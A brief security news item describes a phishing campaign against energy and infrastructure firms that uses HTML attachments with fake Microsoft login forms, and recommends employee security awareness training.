Security researchers have uncovered a phishing campaign targeting energy and other infrastructure companies by exploiting HTML attachments that contain credential stealing forms. In this specific campaign, the threat actor portrays the phishing email as a being from an internal source by leveraging the “Shared-Files via” feature of Microsoft 365 and masquerades as a transcript being sent to the victim. However, the email address, with a Japanese domain, is clearly visible. After downloading the HTML file, users are prompted to enter their Microsoft email password to access a fake invoice. This fairly minor phishing campaign may seem trivial but organizations are frequently compromised after an unknowing employee falls victim to such phishing scams. Indeed, one survey found that 83 percent of organizations that experienced a breech in 2021 was from phishing attacks. Therefore, implementing security awareness training is critical for all organizations, as understanding that the threat exists is half the battle. To help employees know what to look out for, consider the following resources in your security awareness reminders, 16 Social Engineering Attack Types and Nothing personal: Training employees to identify a spear phishing attack. Read more at Cofense, HelpNetSecurity, or at ArcticWolf.
H2Oex: In Person 1 day event/exercise. Thurs Dec 5th. Washington DC. Join us!